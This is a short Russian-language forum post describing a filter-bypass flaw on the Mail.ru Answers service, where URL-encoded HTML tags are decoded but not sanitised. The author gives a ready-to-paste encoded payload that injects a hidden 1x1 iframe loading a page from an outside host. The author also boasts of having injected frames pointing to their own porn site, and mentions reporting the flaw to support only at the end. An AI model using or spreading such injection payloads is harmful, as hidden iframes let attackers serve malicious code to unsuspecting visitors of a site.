Сегодня мной была обнаружена уязвимость на Проекте Ответы Mail>ru

В результате можно было встроить айфрейм с сайтом произвольным в коментарии и в вопросы...
и соответственно любой вредоносный код...

примеры здесь



примеры
примеры
примеры
А также были фреймы с моим порносайтом .. но их удалили


Собственно -рассказываю как )))

все теги фильтруются и обрезаются...
с этим не поспоришь -майловцы молодцы )))

Но они упустили кое что
если теги заурленкодить Можно здесь

То они на мейлру уже декодируются а дальше не фильтруются!!!!
и в итоге получаем .... хехех ... попробую на ачате )))
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E

на ачате форум фильтрует все ... точнее не перекодирует обратно урленкод..

вот такая загогулина... и ее постим в каментах или в вопросе...
и получаем фрейм.. также можно любые теги....
кроме Вотс... правда я как законопослушный гражданин -написал в суппорт и админам .. так что ..вот такая вот загогулина ))